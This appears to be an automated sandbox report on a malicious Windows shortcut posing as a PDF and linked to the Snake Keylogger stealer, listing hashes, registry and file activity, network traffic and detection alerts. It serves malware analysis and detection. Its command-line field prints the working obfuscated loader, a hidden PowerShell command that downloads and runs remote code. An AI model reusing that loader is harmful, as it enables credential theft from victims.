File name:	.lnk
Full analysis:	https://app.any.run/tasks/44561158-5c0e-4ee7-a4ac-d37574e36269
Verdict:	Malicious activity
Threats:	A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	February 19, 2025, 06:40:43
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	evasion snake keylogger stealer susp-powershell
Indicators:
MIME:	application/x-ms-shortcut
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon, Archive, ctime=Thu Jan 16 17:34:21 2025, atime=Thu Jan 16 17:34:21 2025, mtime=Thu Jan 16 17:34:21 2025, length=278528, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:	827EC9A77B972D4467144FB8A4E59065
SHA1:	746477AE49748524DBE606665DCBB3467F9F8886
SHA256:	FCD67519F34EA85F3FB2ED343CD84D20A97DA2B2E50838470F8769130B73E338
SSDEEP:	48:8BTUnMJXr1QqsW6YxSn9TDuJbf4mIA+5MwJDrOsaEHhfEsVUBpbtib9Wh6daXuHc:8BdX+d1ZCVg1OwJGQPV4iR4dueM

Flags:	IDList, LinkInfo, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes:	Archive
CreateDate:	2025:01:16 17:34:21+00:00
AccessDate:	2025:01:16 17:34:21+00:00
ModifyDate:	2025:01:16 17:34:21+00:00
TargetFileSize:	278528
IconIndex:	11
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	cmd.exe
DriveType:	Fixed Disk
DriveSerialNumber:	B439-BFAE
VolumeLabel:	Windows Server
LocalBasePath:	C:\Windows\System32\cmd.exe
Description:	document.pdf
RelativePath:	..\..\..\Windows\System32\cmd.exe
CommandLineArguments:	cmd /v:on /c "set var1=po^wersh^ell& set var2=-Win^dowS^tyle& set var3=Hid^den& set var4=-En^codedCom^mand& set var5=CgAKACQAQQAxAD0AWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBVADMAbAB6AGQARwBWAHQATABrADUAbABkAEMANQBYAFoAVwBKAEQAYgBHAGwAbABiAG4AUQA9ACcAKQApAAoACgAKACQAQQAyAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgACgAJABBADEAKQAKAAoACgAkAEEAMwA9AFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAUgBHADkAMwBiAG0AeAB2AFkAVwBSAFQAZABIAEoAcABiAG0AYwA9ACcAKQApAAoACgAKACQAQQA1AD0AIgBoAHQAdABwAHMAOgAvAC8AMAB4ADAALgBzAHQALwA4AGIAdwAyAC4AdAB4AHQAIgAKAAoACgAkAEEANgA9ACQAQQAyAC4AJABBADMAKAAkAEEANQApAAoACgAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAQQA2AAoACgAgACAAIAAgAA==& !var1! !var2! !var3! !var4! !var5!"
IconFileName:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
MachineID:	server97582


(PID) Process:	(6724) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:	write	Name:	Acrobat.Document.DC
Value:
(PID) Process:	(7008) Acrobat.exe	Key:	HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:	write	Name:	DisplayName
Value: Adobe Acrobat Reader Protected Mode
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:	write	Name:	bLastExitNormal
Value: 0
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:	write	Name:	bSynchronizeOPL
Value: 0
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	uLastAppLaunchTimeStamp
Value: 485510120
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:	write	Name:	iNumAcrobatLaunches
Value: 7
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\NoTimeOut
Operation:	write	Name:	smailto
Value: 5900
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ToolsSearch
Operation:	write	Name:	iSearchHintIndex
Value: 3
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AdobeViewer
Operation:	delete value	Name:	ProductInfoCache
Value:
(PID) Process:	(6300) Acrobat.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AdobeViewer
Operation:	write	Name:	EULAAcceptedForBrowser
Value: 1

PID	Process	Filename		Type
6724	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yvgienpk.nap.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6724	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1dgpz4kc.tkx.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6336	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e0bodjtj.tuk.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6336	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sqgrw1nc.4gr.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6724	powershell.exe	C:\Users\admin\AppData\Local\Temp\PO_Swift%20Payment.pdf		pdf
		MD5:4F05F4D6A8B774B70CE538BE803E35B4	SHA256:97FF7F09C6ADBD76F24C7F97E63F73C343E12D520B1FB9C50246762BD4CF96EE
7084	cscript.exe	C:\Users\admin\AppData\Local\Temp\EWVm.bat		text
		MD5:F6D052E977E9C552C03225F298A63B2F	SHA256:94700A41A4F8DF1AB648830505B51F9390832325303D9EAF10E33C7A5E7AB47F
6300	Acrobat.exe	C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents		binary
		MD5:CBBAE92457310418A07930B1A3BB5F7F	SHA256:24E34FA95E248FFE4895E2F902000F33C0340C5678AA69C64C3B616986521FB6
6300	Acrobat.exe	C:\Users\admin\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.1.20093.6 2025-02-19 06-41-08-994.log		text
		MD5:460C6041966002D8384A18C895A65EB0	SHA256:C83EC6E8FB3EC62481289C033238C1D9B08DB8076EAAD304099FD7A7F594F1B9
5736	AcroCEF.exe	C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old		text
		MD5:2EF1F7C0782D1A46974286420D24F629	SHA256:D3A9BB7E09E1F4B0C41FF7808E930DDACF5DB3BACD98ECCF5BC7DB4863D1FCF5
5736	AcroCEF.exe	C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old~RF13ba6a.TMP		text
		MD5:7383516745DEC1E86152192435F92D1F	SHA256:E22D34BBD915EEB277D4F4138D176EACE5577CF035EF7C2C80A4BC4D9B6C0E1D

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4712	MoUsoCoreWorker.exe	GET	200	23.219.150.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4712	MoUsoCoreWorker.exe	GET	200	2.16.164.9:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
—	—	GET	401	13.107.6.158:443	https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox	unknown	—	—	—
—	—	OPTIONS	204	52.6.155.20:443	https://p13n.adobe.io/psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&adcProductLanguage=en-us&adcVersion=23.1.20093&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RU&adcXAPIClientID=api_reader_desktop_win_23.1.20093&encodingScheme=BASE_64	unknown	—	—	—
—	—	GET	304	13.107.21.239:443	https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist	unknown	—	—	—
—	—	GET	200	13.107.246.45:443	https://edge-mobile-static.azureedge.net/eccp/get?settenant=edge-config&setplatform=win&setmkt=en-US&setchannel=stable	unknown	binary	14.3 Kb	whitelisted
—	—	GET	200	168.119.145.117:443	https://0x0.st/8bw2.txt	unknown	text	75.2 Kb	—
—	—	GET	200	13.107.42.16:443	https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeFirstRun%2CEdgeFirstRunConfig&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=44&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1	unknown	binary	768 b	whitelisted
—	—	GET	200	13.107.21.239:443	https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=122.0.2365.59&experimentationmode=2&scpguard=0&scpfull=0&scpver=0	unknown	binary	184 b	whitelisted
—	—	GET	200	148.135.107.234:443	https://burtintemational.com/PO_Swift%20Payment.pdf	unknown	pdf	24.9 Kb	—

PID	Process	IP	Domain	ASN	CN	Reputation
4712	MoUsoCoreWorker.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
—	—	2.19.96.130:443	www.bing.com	Akamai International B.V.	DE	whitelisted
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
—	—	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
4712	MoUsoCoreWorker.exe	2.16.164.9:80	crl.microsoft.com	Akamai International B.V.	NL	whitelisted
4712	MoUsoCoreWorker.exe	23.219.150.101:80	www.microsoft.com	AKAMAI-AS	CL	whitelisted
4712	MoUsoCoreWorker.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
6724	powershell.exe	168.119.145.117:443	0x0.st	Hetzner Online GmbH	DE	suspicious
3976	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208 51.104.136.2 4.231.128.59	whitelisted
www.bing.com	2.19.96.130 2.19.96.16 2.19.96.96 2.19.96.18 2.19.96.88 2.19.96.91 2.19.96.128 2.19.96.90 2.19.96.120 23.15.178.211 23.15.178.218 23.15.178.194 23.15.178.200 23.15.178.216 23.15.178.201 23.15.178.210 23.15.178.202 23.15.178.203 23.15.178.242 23.15.178.248 23.15.178.234 23.15.178.251 23.15.178.233 23.15.178.250 23.15.178.219 23.15.178.232 23.15.178.249 23.15.178.170 23.15.178.185 23.15.178.163 23.15.178.193 23.15.178.192 23.15.178.176 23.15.178.178 23.15.178.179	whitelisted
google.com	142.250.185.238	whitelisted
crl.microsoft.com	2.16.164.9 2.16.164.106	whitelisted
www.microsoft.com	23.219.150.101	whitelisted
0x0.st	168.119.145.117	unknown
burtintemational.com	148.135.107.234	unknown
geo2.adobe.com	104.115.88.161	whitelisted
config.edge.skype.com	13.107.42.16	whitelisted
zunigarquitectura.com	201.148.104.141	unknown

PID	Process	Class	Message
2192	svchost.exe	Misc activity	ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
6724	powershell.exe	Misc activity	ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
—	—	Not Suspicious Traffic	ET INFO Windows Powershell User-Agent Usage
—	—	Misc activity	ET INFO Request for PDF via PowerShell
6336	powershell.exe	Misc activity	ET FILE_SHARING File Sharing Domain Observed in TLS SNI (0x0 .st)
—	—	Not Suspicious Traffic	ET INFO Windows Powershell User-Agent Usage
2192	svchost.exe	Device Retrieving External IP Address Detected	ET DYN_DNS External IP Lookup Domain in DNS Query (checkip .dyndns .org)
6336	powershell.exe	Device Retrieving External IP Address Detected	ET INFO External IP Lookup - checkip.dyndns.org
6336	powershell.exe	Device Retrieving External IP Address Detected	ET INFO 404/Snake/Matiex Keylogger Style External IP Check
2192	svchost.exe	Device Retrieving External IP Address Detected	INFO [ANY.RUN] External IP Address Lookup Domain (reallyfreegeoip .org)

General Info

.lnk

827EC9A77B972D4467144FB8A4E59065

746477AE49748524DBE606665DCBB3467F9F8886

FCD67519F34EA85F3FB2ED343CD84D20A97DA2B2E50838470F8769130B73E338

48:8BTUnMJXr1QqsW6YxSn9TDuJbf4mIA+5MwJDrOsaEHhfEsVUBpbtib9Wh6daXuHc:8BdX+d1ZCVg1OwJGQPV4iR4dueM

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

Uses AES cipher (POWERSHELL)

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

Dynamically loads an assembly (POWERSHELL)

Create files in the Startup directory

Request from PowerShell which ran from CMD.EXE

SNAKEKEYLOGGER has been detected (SURICATA)

Actions looks like stealing of personal data

Steals credentials from Web Browsers

SUSPICIOUS

BASE64 encoded PowerShell command has been detected

Starts POWERSHELL.EXE for commands execution

Base64-obfuscated command line is found

Uses base64 encoding (POWERSHELL)

Writes data into a file (POWERSHELL)

The process executes VB scripts

Writes binary data to a Stream object (SCRIPT)

Gets file extension (POWERSHELL)

Creates FileSystem object to access computer's file system (SCRIPT)

Starts CMD.EXE for commands execution

Executing commands from a ".bat" file

Runs shell command (SCRIPT)

Application launched itself

Checks for external IP

The process verifies whether the antivirus software is installed

Connects to SMTP port

INFO

Disables trace logs

Uses string split method (POWERSHELL)

Checks proxy server information

Application launched itself

Reads security settings of Internet Explorer

Create files in a temporary directory

Manual execution by a user

Checks current location (POWERSHELL)

Uses string replace method (POWERSHELL)

Found Base64 encoded text manipulation via PowerShell (YARA)

Found Base64 encoded file access via PowerShell (YARA)

Found Base64 encoded reflection usage via PowerShell (YARA)

Found Base64 encoded compression PowerShell classes (YARA)

Found Base64 encoded encryption-related PowerShell classes (YARA)

Reads the computer name

Checks supported languages

Reads Environment values

Converts byte array into ASCII string (POWERSHELL)

Gets data length (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information